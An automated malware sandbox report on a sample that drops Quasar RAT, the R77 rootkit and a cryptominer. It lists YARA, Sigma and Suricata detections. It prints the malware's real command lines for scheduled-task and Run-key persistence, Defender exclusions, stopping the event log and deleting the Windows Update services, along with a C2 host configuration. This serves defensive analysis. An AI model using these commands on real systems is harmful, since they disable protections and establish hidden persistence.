68.2.conhost.exe.1a646d10000.2.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
66.2.kaptsegthwf.exe.23e07fa0000.3.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
66.2.kaptsegthwf.exe.23e07fa0000.3.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
68.2.conhost.exe.1a646d40000.3.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
68.2.conhost.exe.1a646d40000.3.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
63.2.sc.exe.17cd5af0000.2.raw.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
63.2.sc.exe.17cd5af0000.2.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
68.2.conhost.exe.1a646d10000.2.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
68.2.conhost.exe.1a646d10000.2.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
66.2.kaptsegthwf.exe.23e07f70000.2.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
66.2.kaptsegthwf.exe.23e07f70000.2.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
63.2.sc.exe.17cd5b20000.3.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
63.2.sc.exe.17cd5b20000.3.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
63.2.sc.exe.17cd5af0000.2.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
63.2.sc.exe.17cd5af0000.2.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
3.0.F4R5fd8grr.exe.e70000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
3.0.F4R5fd8grr.exe.e70000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.F4R5fd8grr.exe.e70000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x5b594:$x1: Quasar.Common.Messages 0x5ec4d:$x1: Quasar.Common.Messages 0x6aee8:$x4: Uninstalling... good bye :-( 0x6c60d:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
3.0.F4R5fd8grr.exe.e70000.0.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x5c0d1:$s2: set_SystemInfos 0x57ad9:$s4: set_RemotePath 0x7cc4c:$s6: Client.exe 0x7cd0c:$s6: Client.exe
3.0.F4R5fd8grr.exe.e70000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x6a88c:$f1: FileZilla\recentservers.xml 0x6a8cc:$f2: FileZilla\sitemanager.xml 0x6a90e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x6aa8c:$b1: Chrome\User Data\ 0x6ac02:$b2: Mozilla\Firefox\Profiles 0x6acfe:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x761f7:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x6ad9a:$b4: Opera Software\Opera Stable\Login Data 0x6ae04:$b5: YandexBrowser\User Data\ 0x6ac52:$s4: logins.json 0x6aaf8:$a1: username_value 0x6ab16:$a2: password_value 0x6ac92:$a3: encryptedUsername 0x7613b:$a3: encryptedUsername 0x6acb6:$a4: encryptedPassword 0x76159:$a4: encryptedPassword 0x760d7:$a5: httpRealm
3.0.F4R5fd8grr.exe.e70000.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x2cd2e:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2cdd9:$s2: DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null 0x6afd2:$s3: Process already elevated. 0x5b462:$s4: get_PotentiallyVulnerablePasswords 0x5621f:$s5: GetKeyloggerLogsDirectory 0x5ea08:$s5: GetKeyloggerLogsDirectory 0x5b485:$s6: set_PotentiallyVulnerablePasswords 0x7794b:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
68.2.conhost.exe.1a646d40000.3.raw.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
68.2.conhost.exe.1a646d40000.3.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
63.2.sc.exe.17cd5b20000.3.raw.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
63.2.sc.exe.17cd5b20000.3.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
66.2.kaptsegthwf.exe.23e07fa0000.3.raw.unpack	JoeSecurity_R77RootKit	Yara detected R77 RootKit	Joe Security
66.2.kaptsegthwf.exe.23e07fa0000.3.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
Click to see the 25 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7748, ProcessName: powercfg.exe

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\GR55Qg1hth.exe" , ParentImage: C:\Users\user\Desktop\GR55Qg1hth.exe, ParentProcessId: 7540, ParentProcessName: GR55Qg1hth.exe, ProcessCommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 8124, ProcessName: cmd.exe

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GR55Qg1hth.exe" , ParentImage: C:\Users\user\Desktop\GR55Qg1hth.exe, ParentProcessId: 7540, ParentProcessName: GR55Qg1hth.exe, ProcessCommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontSt

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7564, ProcessName: powershell.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GR55Qg1hth.exe" , ParentImage: C:\Users\user\Desktop\GR55Qg1hth.exe, ParentProcessId: 7540, ParentProcessName: GR55Qg1hth.exe, ProcessCommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontSt

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\SubDir\Client.exe", ParentImage: C:\Users\user\AppData\Roaming\SubDir\Client.exe, ParentProcessId: 7916, ParentProcessName: Client.exe, ProcessCommandLine: "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, ProcessId: 7960, ProcessName: schtasks.exe

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GR55Qg1hth.exe" , ParentImage: C:\Users\user\Desktop\GR55Qg1hth.exe, ParentProcessId: 7540, ParentProcessName: GR55Qg1hth.exe, ProcessCommandLine: powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontSt

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto", ProcessId: 5848, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7564, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" , ParentImage: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, ParentProcessId: 7528, ParentProcessName: gfiKDLgr58thy4d.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7372, ProcessName: sc.exe

Suricata Signatures

ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:58:00.964292+0100	2017871	2	Crypto Currency Mining Activity Detected	192.168.2.4	49738	31.220.102.19	3333	TCP
2025-01-02T09:58:34.299221+0100	2017871	2	Crypto Currency Mining Activity Detected	192.168.2.4	49738	31.220.102.19	3333	TCP
2025-01-02T09:58:34.299494+0100	2017871	2	Crypto Currency Mining Activity Detected	192.168.2.4	49738	31.220.102.19	3333	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 5fr5gthkjdg71.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Program Files\Cuis\bon\Bara.exe	Avira: detection malicious, Label: HEUR/AGEN.1329574
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Avira: detection malicious, Label: HEUR/AGEN.1329574
Source: C:\Users\user\AppData\Local\Temp\FA9.tmp	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen

Found malware configuration

Source: 5fr5gthkjdg71.exe

Malware Configuration Extractor: Quasar {"Version": "1.4.0", "Host:Port": "185.148.3.216:4000;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c3557859-56ac-475e-b44d-e1b60c20d0d0", "Tag": "4Drun", "LogDirectoryName": "Logs"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Cuis\bon\Bara.exe	ReversingLabs: Detection: 90%
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\FA9.tmp	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: 5fr5gthkjdg71.exe	Virustotal: Detection: 76%			Perma Link
Source: 5fr5gthkjdg71.exe	ReversingLabs: Detection: 63%

Yara detected Quasar RAT

Source: Yara match	File source: 5fr5gthkjdg71.exe, type: SAMPLE
Source: Yara match	File source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5fr5gthkjdg71.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F4R5fd8grr.exe PID: 7548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Client.exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Cuis\bon\Bara.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FA9.tmp	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 5fr5gthkjdg71.exe

Joe Sandbox ML: detected

Exploits

Yara detected R77 RootKit

Source: Yara match	File source: 66.2.kaptsegthwf.exe.23e07f70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 68.2.conhost.exe.1a646d10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.kaptsegthwf.exe.23e07fa0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 68.2.conhost.exe.1a646d40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.sc.exe.17cd5af0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 68.2.conhost.exe.1a646d10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.kaptsegthwf.exe.23e07f70000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.sc.exe.17cd5b20000.3.unpack, type: UNPACKEDPE
